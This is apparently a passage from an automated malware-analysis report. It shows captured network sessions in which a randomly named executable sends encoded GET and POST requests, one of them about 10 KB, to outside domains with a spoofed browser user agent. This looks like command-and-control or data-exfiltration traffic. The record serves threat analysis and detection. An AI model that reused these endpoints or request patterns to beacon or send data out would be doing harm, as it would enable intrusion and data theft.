                                                                      Data Raw: 35 31 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 57 dd 6f dc 36 0c 7f ce 01 f9 1f 58 0d c8 b5 d8 7c 4e fa b1 15 ad ed a1 4b 1b ac 0f eb 82 a6 c5 b0 a7 41 67 d3 b6 16 59 52 24 f9 2e 07 ec 8f 1f 24 f9 f3 7a 4b ee 61 79 38 4b 24 c5 1f 49 91 14 93 3c 79 ff fb e5 97 3f af 3f 40 6d 1b 9e 2d 12 f7 81 82 e9 94 70 ab 09 70 2a aa 94 a0 88 be de 10 c7 45 5a 64 8b a4 41 4b 21 af a9 36 68 53 f2 f5 cb 55 f4 9a 40 9c 2d 12 cb 2c c7 ec 9a 56 08 42 5a 28 65 2b 0a f8 07 72 56 52 23 f2 15 13 a5
                                                                      Data Ascii: 51eWo6X|NKAgYR$.$zKay8K$I<y??@m-pp*EZdAK!6hSU@-,VBZ(e+rVR#
                                                                      Jan 13, 2025 09:41:14.168040991 CET1162INData Raw: 4c e2 20 b4 48 38 13 b7 a0 91 a7 44 69 59 32 8e 04 6a 8d 65 4a 6a 6b d5 9b 38 ae 1a 55 ad a4 ae e2 fb 52 c4 17 17 01 61 3c 64 ec 8e a3 a9 11 2d 01 bb 53 98 12 8b f7 36 ce 8d 21 d0 60 c1 68 4a 28 e7 7b 3a a7 96 c4 5b 15 e5 52 58 14 36 b6 35 36 68
                                                                      Data Ascii: L H8DiY2jeJjk8URa<d-S6!`hJ({:[RX656h[Thcy!)oVJj4{{R2)bm'N8oxD,R6k;|(a3o)q|PJ40L&rhVXuDT2 ,!,m


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      36192.168.2.450039188.114.96.3805816C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 09:41:16.211685896 CET466OUTGET /8rr3/?88v07=iJ8hmWjdEFuk0u09mxt/i+URJBIu2+/oU8wTtz6qpCRnWDAwsuGK654yLyD0CfrWg+eEASr+Wzr+b0deN6ZH6nrWdXOKgOfZXH6QuC8SwJrjPV5LCLXfvVQ=&O2=aP0Tt HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Host: www.cifasnc.info
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Jan 13, 2025 09:41:16.710911989 CET1219INHTTP/1.1 301 Moved Permanently
                                                                      Date: Mon, 13 Jan 2025 08:41:16 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      x-pingback: http://cifasnc.info/xmlrpc.php
                                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                      last-modified: Mon, 13 Jan 2025 08:41:16 GMT
                                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                                      pragma: no-cache
                                                                      location: http://cifasnc.info/8rr3/?88v07=iJ8hmWjdEFuk0u09mxt/i+URJBIu2+/oU8wTtz6qpCRnWDAwsuGK654yLyD0CfrWg+eEASr+Wzr+b0deN6ZH6nrWdXOKgOfZXH6QuC8SwJrjPV5LCLXfvVQ=&O2=aP0Tt
                                                                      vary: User-Agent
                                                                      x-turbo-charged-by: LiteSpeed
                                                                      cf-cache-status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dcMsIjNUfYsrEC7zhe2ZjAMVOoEGDc6UBi9%2BDCO1siTWYSh1%2FmHf13SWSZTfqwnL0mxKep2ATopLQ0fsZZJMyoQCyw5Pnou0wFxhaaVzcMVIFHm1N%2BsuSBeWzpXXdHNa2%2F5L"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 90141616cc77c341-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1481&min_rtt=1481&rtt_var=740&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=466&delivery_rate=0&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      37192.168.2.450040199.59.243.228805816C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 09:41:29.888696909 CET758OUTPOST /dx3i/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.denture-prices.click
                                                                      Origin: http://www.denture-prices.click
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 202
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.denture-prices.click/dx3i/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 38 38 76 30 37 3d 51 2b 69 53 35 57 69 5a 4f 70 49 6f 2f 58 4d 45 62 39 30 66 4d 62 62 44 46 4b 78 78 2f 43 43 73 38 6b 56 35 57 47 78 7a 65 79 52 76 59 4c 45 47 54 54 41 52 64 6e 35 73 72 58 6f 4d 58 53 6c 73 58 71 33 64 4d 4a 4b 31 6c 42 47 5a 6a 45 33 53 36 4f 6c 36 5a 30 44 41 39 47 46 6f 71 6d 4c 58 5a 2f 44 4b 64 4b 41 37 6b 64 73 65 4c 6f 52 46 49 47 58 57 5a 6b 49 67 6b 54 39 62 63 64 42 70 57 66 42 66 2b 4a 46 78 48 65 77 4d 6e 6b 63 31 70 37 2b 6c 51 51 33 44 65 6e 2b 78 45 62 50 49 47 56 59 6a 54 77 7a 73 6e 57 48 32 38 49 36 57 4b 69 62 30 68 34 44 6e 33 2b 37 71 73 32 4d 2b 7a 67 3d 3d
                                                                      Data Ascii: 88v07=Q+iS5WiZOpIo/XMEb90fMbbDFKxx/CCs8kV5WGxzeyRvYLEGTTARdn5srXoMXSlsXq3dMJK1lBGZjE3S6Ol6Z0DA9GFoqmLXZ/DKdKA7kdseLoRFIGXWZkIgkT9bcdBpWfBf+JFxHewMnkc1p7+lQQ3Den+xEbPIGVYjTwzsnWH28I6WKib0h4Dn3+7qs2M+zg==
                                                                      Jan 13, 2025 09:41:30.343450069 CET1236INHTTP/1.1 200 OK
                                                                      date: Mon, 13 Jan 2025 08:41:29 GMT
                                                                      content-type: text/html; charset=utf-8
                                                                      content-length: 1146
                                                                      x-request-id: e5602403-bfc5-4105-a96c-a4fa18a3e57f
                                                                      cache-control: no-store, max-age=0
                                                                      accept-ch: sec-ch-prefers-color-scheme
                                                                      critical-ch: sec-ch-prefers-color-scheme
                                                                      vary: sec-ch-prefers-color-scheme
                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_n6kA0EWYJHvI8PDq8Zy6kmv+rMkPDXtErk9t2ugLCuL0Rt9pQRHZKCMmJFhMaZLjVHwUzsDAVsEwPGdd+RD6Dw==
                                                                      set-cookie: parking_session=e5602403-bfc5-4105-a96c-a4fa18a3e57f; expires=Mon, 13 Jan 2025 08:56:30 GMT; path=/
                                                                      connection: close
                                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6e 36 6b 41 30 45 57 59 4a 48 76 49 38 50 44 71 38 5a 79 36 6b 6d 76 2b 72 4d 6b 50 44 58 74 45 72 6b 39 74 32 75 67 4c 43 75 4c 30 52 74 39 70 51 52 48 5a 4b 43 4d 6d 4a 46 68 4d 61 5a 4c 6a 56 48 77 55 7a 73 44 41 56 73 45 77 50 47 64 64 2b 52 44 36 44 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_n6kA0EWYJHvI8PDq8Zy6kmv+rMkPDXtErk9t2ugLCuL0Rt9pQRHZKCMmJFhMaZLjVHwUzsDAVsEwPGdd+RD6Dw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                      Jan 13, 2025 09:41:30.343492031 CET599INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZTU2MDI0MDMtYmZjNS00MTA1LWE5NmMtYTRmYTE4YTNlNTdmIiwicGFnZV90aW1lIjoxNzM2NzU3Nj


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      38192.168.2.450041199.59.243.228805816C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 09:41:32.439866066 CET778OUTPOST /dx3i/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.denture-prices.click
                                                                      Origin: http://www.denture-prices.click
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 222
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.denture-prices.click/dx3i/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 38 38 76 30 37 3d 51 2b 69 53 35 57 69 5a 4f 70 49 6f 2b 32 63 45 65 62 38 66 4a 37 62 45 4a 71 78 78 78 69 44 72 38 6b 5a 35 57 48 45 32 65 67 31 76 5a 72 30 47 42 43 41 52 63 6e 35 73 6c 33 6f 4a 5a 79 6c 37 58 71 72 2f 4d 49 6d 31 6c 48 71 5a 6a 42 4c 53 36 64 64 37 59 6b 44 4f 32 6d 46 71 79 47 4c 58 5a 2f 44 4b 64 4b 55 52 6b 64 30 65 4c 64 42 46 4a 6e 58 56 52 45 49 6a 74 7a 39 62 59 64 42 74 57 66 42 59 2b 49 5a 50 48 63 49 4d 6e 6b 73 31 6f 76 71 6d 62 51 33 46 44 33 2f 48 4d 49 4c 46 44 33 70 51 4d 6d 79 4b 36 58 37 6b 39 4f 33 4d 62 54 36 6a 7a 34 6e 55 71 35 79 65 68 31 78 33 6f 68 4b 79 72 6f 44 4e 35 37 34 6c 61 31 37 32 4f 50 36 46 74 6a 41 3d
                                                                      Data Ascii: 88v07=Q+iS5WiZOpIo+2cEeb8fJ7bEJqxxxiDr8kZ5WHE2eg1vZr0GBCARcn5sl3oJZyl7Xqr/MIm1lHqZjBLS6dd7YkDO2mFqyGLXZ/DKdKURkd0eLdBFJnXVREIjtz9bYdBtWfBY+IZPHcIMnks1ovqmbQ3FD3/HMILFD3pQMmyK6X7k9O3MbT6jz4nUq5yeh1x3ohKyroDN574la172OP6FtjA=
                                                                      Jan 13, 2025 09:41:32.879940987 CET1236INHTTP/1.1 200 OK
                                                                      date: Mon, 13 Jan 2025 08:41:32 GMT
                                                                      content-type: text/html; charset=utf-8
                                                                      content-length: 1146
                                                                      x-request-id: 9349b20f-4a11-41f4-8229-ecbd35533203
                                                                      cache-control: no-store, max-age=0
                                                                      accept-ch: sec-ch-prefers-color-scheme
                                                                      critical-ch: sec-ch-prefers-color-scheme
                                                                      vary: sec-ch-prefers-color-scheme
                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_n6kA0EWYJHvI8PDq8Zy6kmv+rMkPDXtErk9t2ugLCuL0Rt9pQRHZKCMmJFhMaZLjVHwUzsDAVsEwPGdd+RD6Dw==
                                                                      set-cookie: parking_session=9349b20f-4a11-41f4-8229-ecbd35533203; expires=Mon, 13 Jan 2025 08:56:32 GMT; path=/
                                                                      connection: close
                                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6e 36 6b 41 30 45 57 59 4a 48 76 49 38 50 44 71 38 5a 79 36 6b 6d 76 2b 72 4d 6b 50 44 58 74 45 72 6b 39 74 32 75 67 4c 43 75 4c 30 52 74 39 70 51 52 48 5a 4b 43 4d 6d 4a 46 68 4d 61 5a 4c 6a 56 48 77 55 7a 73 44 41 56 73 45 77 50 47 64 64 2b 52 44 36 44 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_n6kA0EWYJHvI8PDq8Zy6kmv+rMkPDXtErk9t2ugLCuL0Rt9pQRHZKCMmJFhMaZLjVHwUzsDAVsEwPGdd+RD6Dw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                      Jan 13, 2025 09:41:32.879978895 CET599INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOTM0OWIyMGYtNGExMS00MWY0LTgyMjktZWNiZDM1NTMzMjAzIiwicGFnZV90aW1lIjoxNzM2NzU3Nj


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      39192.168.2.450042199.59.243.228805816C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 09:41:34.984188080 CET10860OUTPOST /dx3i/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.denture-prices.click
                                                                      Origin: http://www.denture-prices.click
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 10302
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.denture-prices.click/dx3i/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 38 38 76 30 37 3d 51 2b 69 53 35 57 69 5a 4f 70 49 6f 2b 32 63 45 65 62 38 66 4a 37 62 45 4a 71 78 78 78 69 44 72 38 6b 5a 35 57 48 45 32 65 67 39 76 5a 61 55 47 54 78 34 52 4f 33 35 73 37 6e 6f 49 5a 79 6b 35 58 71 7a 37 4d 4a 61 4c 6c 45 65 5a 6a 6e 2f 53 71 38 64 37 58 6b 44 4f 35 47 46 72 71 6d 4b 58 5a 2b 76 4f 64 4b 45 52 6b 64 30 65 4c 63 78 46 5a 47 58 56 63 6b 49 67 6b 54 39 66 63 64 42 52 57 66 5a 58 2b 49 73 36 48 74 6f 4d 70 67 49 31 76 63 53 6d 48 41 33 48 51 48 2f 50 4d 50 43 46 44 33 6b 72 4d 6d 76 76 36 58 66 6b 2b 36 43 47 48 44 71 59 77 4c 48 5a 34 5a 43 66 73 43 51 32 71 42 61 39 75 39 53 55 74 4a 6f 30 5a 57 4b 43 58 50 53 6b 2f 6c 50 5a 2f 75 48 59 2b 6c 67 79 77 4a 4f 50 43 6c 52 5a 63 46 61 31 6b 32 4d 57 72 63 38 32 6d 41 35 4d 57 69 6c 41 65 54 52 65 43 67 64 55 6f 42 4c 64 4e 46 48 2f 57 2f 30 31 6d 2b 53 2f 41 31 4e 4e 75 61 53 6e 58 37 68 6f 4e 68 66 6f 33 44 47 39 4e 67 2f 34 73 63 6f 74 48 75 34 44 76 76 34 6d 6d 62 79 55 73 69 36 31 4c 48 69 47 4a 43 5a 6b 76 76 43 4b [TRUNCATED]
                                                                      Data Ascii: 88v07=Q+iS5WiZOpIo+2cEeb8fJ7bEJqxxxiDr8kZ5WHE2eg9vZaUGTx4RO35s7noIZyk5Xqz7MJaLlEeZjn/Sq8d7XkDO5GFrqmKXZ+vOdKERkd0eLcxFZGXVckIgkT9fcdBRWfZX+Is6HtoMpgI1vcSmHA3HQH/PMPCFD3krMmvv6Xfk+6CGHDqYwLHZ4ZCfsCQ2qBa9u9SUtJo0ZWKCXPSk/lPZ/uHY+lgywJOPClRZcFa1k2MWrc82mA5MWilAeTReCgdUoBLdNFH/W/01m+S/A1NNuaSnX7hoNhfo3DG9Ng/4scotHu4Dvv4mmbyUsi61LHiGJCZkvvCK26BtHVsYEnpIEd9YhS51WTl8j0rHvT8MIQsWEjlfkA68+77Py6yH0E/+rAYroPL1PgIHkL0J/JCPu7UjgwOVAo9W+PSQELmXL1ECM6WxbKBiNm9z5WJRMqTIee2CIBCI3z9C7aPvvz/OGsHT5h6Lp9p/0NigdEZFbNcDWSVDZJCkjKxjUsq+PigkudWdkffa1Wwx92z5cB7uqlcyE40GDXpNgKiSB/tR/I7FF3hTXZiUUnZ8zjXFa00SdbIoCqJ7qey87W27HiHINfsQNINf1a/CkAsTm6kn/xv5OIj+stzSsEuvjKFbM6ZwUg6rHsMeTMT52dzreG1VsxT8yml31lQyrfnU6GyVz8XHuHTv8EI/bnwXzu823HNdre06UGaiZHQNufKOKnlM0N2/7VxlGucJAeEpOPZKAERZ29Rmj9O8WoMckp4zinRgaYRMnoagkKcq451Flq92I9tHLyy/IQEBodJtBop7g61ewIMEEU9IbspjVxZ5qfludRJU0j7AaYHnPXmsrP+tVI2sHWa9x+hTN1NRvSL+ZslR4IQ5IxNxC6U2sbTOtG8grSTENSSTT2g49QZaT4hocB7vxVDGO0CBHEVeobPBFLWFrevSXxwFq/XW42bULJrrKxwhqWwcAwCKkY/8iEKrt7CJ/jgorbAr3PQVhiyj56 [TRUNCATED]
                                                                      Jan 13, 2025 09:41:35.449476004 CET1236INHTTP/1.1 200 OK
                                                                      date: Mon, 13 Jan 2025 08:41:35 GMT
                                                                      content-type: text/html; charset=utf-8
                                                                      content-length: 1146
                                                                      x-request-id: 83d91824-5aff-48ae-9b44-d260e97b3feb
                                                                      cache-control: no-store, max-age=0
                                                                      accept-ch: sec-ch-prefers-color-scheme
                                                                      critical-ch: sec-ch-prefers-color-scheme
                                                                      vary: sec-ch-prefers-color-scheme
                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_n6kA0EWYJHvI8PDq8Zy6kmv+rMkPDXtErk9t2ugLCuL0Rt9pQRHZKCMmJFhMaZLjVHwUzsDAVsEwPGdd+RD6Dw==
                                                                      set-cookie: parking_session=83d91824-5aff-48ae-9b44-d260e97b3feb; expires=Mon, 13 Jan 2025 08:56:35 GMT; path=/
                                                                      connection: close
                                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6e 36 6b 41 30 45 57 59 4a 48 76 49 38 50 44 71 38 5a 79 36 6b 6d 76 2b 72 4d 6b 50 44 58 74 45 72 6b 39 74 32 75 67 4c 43 75 4c 30 52 74 39 70 51 52 48 5a 4b 43 4d 6d 4a 46 68 4d 61 5a 4c 6a 56 48 77 55 7a 73 44 41 56 73 45 77 50 47 64 64 2b 52 44 36 44 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_n6kA0EWYJHvI8PDq8Zy6kmv+rMkPDXtErk9t2ugLCuL0Rt9pQRHZKCMmJFhMaZLjVHwUzsDAVsEwPGdd+RD6Dw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                      Jan 13, 2025 09:41:35.449515104 CET599INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiODNkOTE4MjQtNWFmZi00OGFlLTliNDQtZDI2MGU5N2IzZmViIiwicGFnZV90aW1lIjoxNzM2NzU3Nj


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      40192.168.2.450043199.59.243.228805816C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 09:41:37.525835991 CET474OUTGET /dx3i/?88v07=d8Ky6hmePKhU2XxFS8oVbq/fBtR8/SXw2U4uZFU2PglJR/EsTh4FCVpvl1B6U0BHfI68a/67nkOplmDPjd8pdEnMsHk7sWiNdLPva59bl5hhAP4TZGe3ZV4=&O2=aP0Tt HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Host: www.denture-prices.click
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Jan 13, 2025 09:41:37.999268055 CET1236INHTTP/1.1 200 OK
                                                                      date: Mon, 13 Jan 2025 08:41:37 GMT
                                                                      content-type: text/html; charset=utf-8
                                                                      content-length: 1470
                                                                      x-request-id: a7b84aeb-232e-4b36-bef5-42cbfb7ded7f
                                                                      cache-control: no-store, max-age=0
                                                                      accept-ch: sec-ch-prefers-color-scheme
                                                                      critical-ch: sec-ch-prefers-color-scheme
                                                                      vary: sec-ch-prefers-color-scheme
                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CPnJE4GkI174v4jcfuc1zKtt98BX9ShBTXoSpyOKN3dOe71qs/qtrOcA8u2/lfRuaCK8dxwXVHdlPUP7NecQ6g==
                                                                      set-cookie: parking_session=a7b84aeb-232e-4b36-bef5-42cbfb7ded7f; expires=Mon, 13 Jan 2025 08:56:37 GMT; path=/
                                                                      connection: close
